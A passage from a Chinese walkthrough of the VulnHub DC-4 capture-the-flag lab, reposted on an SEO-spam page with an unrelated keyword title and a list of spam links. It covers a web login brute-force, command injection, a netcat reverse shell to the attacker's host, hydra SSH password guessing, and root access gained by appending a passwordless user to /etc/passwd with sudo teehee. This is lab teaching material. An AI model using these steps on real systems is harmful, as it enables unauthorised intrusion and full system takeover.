当前位置: 首页 > wzjs >正文

淄博网站建设兼职合肥关键词快速排名

淄博网站建设兼职,合肥关键词快速排名,网站建设创客,网页建站怎么设置下载地址:https://www.vulnhub.com/entry/dc-4,313/ 扫描IP地址 arp-sacn -l扫描端口,开启了80和22端口 nmap -p- 192.168.112.140访问80端口 扫描目录,并没有发现敏感目录 尝试爆破 爆破成功,用户名admin 密码happy 登录成功 …

下载地址:https://www.vulnhub.com/entry/dc-4,313/

扫描IP地址

arp-sacn -l

扫描端口,开启了80和22端口

nmap -p- 192.168.112.140

访问80端口

扫描目录,并没有发现敏感目录

尝试爆破

爆破成功,用户名admin 密码happy

登录成功

里面是已经执行的三个命令,

ls -l

du -h

df -h

既然可以执行命令,那就可以尝试抓包来修改命令

成功执行whoami

尝试写一句话木马进去,但是我们的php代码被过滤了

换一种方式,尝试反弹shell

nc+192.168.112.132+4444+-e+/bin/bash

成功反弹

接下来就是提权

先看一下版本信息

uname -a

并没有可以利用的脚本

之前nmap扫出有22端口,那可以看一下/home目录下的用户

在jim目录下面找到了一些文件,

jim目录下面有一个文件夹和两个文件,mbox没有权限,test.sh不知道写的啥

只有backups目录下面有一个旧密码备份,这里面应该就有jim的ssh密码

使用hydra爆破一下,将密码字典复制到kali,新建文本文件ps.txt作为hydra的爆破字典

hydra -l jim -P ./ps.txt 192.168.10.150 ssh

得到jim的密码为 jibril04

使用ssh成功登录到jim用户

jim目录权限可以查看mbox文件

里面提示我们在/var/emi里面有一封邮件

邮件内容是我们的另一个用户charles发给jim的,里面有他的密码^xHhA&hvim0y

切换到charles用户,查看一下sudo授权

发现可以无密码执行/usr/bin/teehee

teehee命令可以往一个文件追加内容,可以通过它向/etc/passwd写入内容,新增一个超级用户

向passwd文件中追加一个超级用户

echo "hack::0:0:::/bin/bash" | sudo teehee -a  /etc/passwd

成功提权,找到flag

http://www.dtcms.com/wzjs/42254.html

相关文章:

  • b站推广计划网络推广如何收费
  • 南宁网站定制团队樱桃bt磁力天堂
  • 网站结构该怎么做本地网络seo公司
  • 织梦做网站百度账号注册中心
  • 网站改版活动百度推广优化排名怎么收费
  • 网站建设买了服务器后怎么做定制网站制作公司
  • 自贡网站建设公司百度快照和广告的区别
  • 专业做家电经销的网站酒店网络营销方式有哪些
  • 山楼小院在哪家网站做宣传网站推广app
  • 房地产开发公司网站建设方案模板网络推广计划书范文
  • 做美工的网站网站怎么创建
  • 专业的营销网站发布新闻的平台有哪些
  • 甘肃模板型网站建设广东网约车涨价
  • 做现货去哪些网站营销好呢百度推广代理开户
  • 做venn图的网站厦门seo测试
  • 龙岗做网站的公司seo系统
  • 武汉培训网站建设免费建站网站一级
  • 包装材料网站建设什么是论坛推广
  • 网站适配怎么做网络热词2021
  • 十大设计创意产品网站搜狗网页版入口
  • 广州网站建设公司嘉御软件开发公司排行榜
  • 十大网站开发公司网络销售好做吗
  • 南宁网吧股票发行ipo和seo是什么意思
  • 中国建设银行信用卡网站首页seo网络优化是什么意思
  • 秦皇岛网站制作定制关键词组合工具
  • 哪些网站比较容易做什么是百度快照
  • 广州做网站价位如何免费制作网站
  • 做网站还是app省钱推广软文是什么意思
  • 网站建设费用没有发票怎样入账seo排名优化代理
  • 有没有在淘宝找人做网站被骗过的ip或域名查询网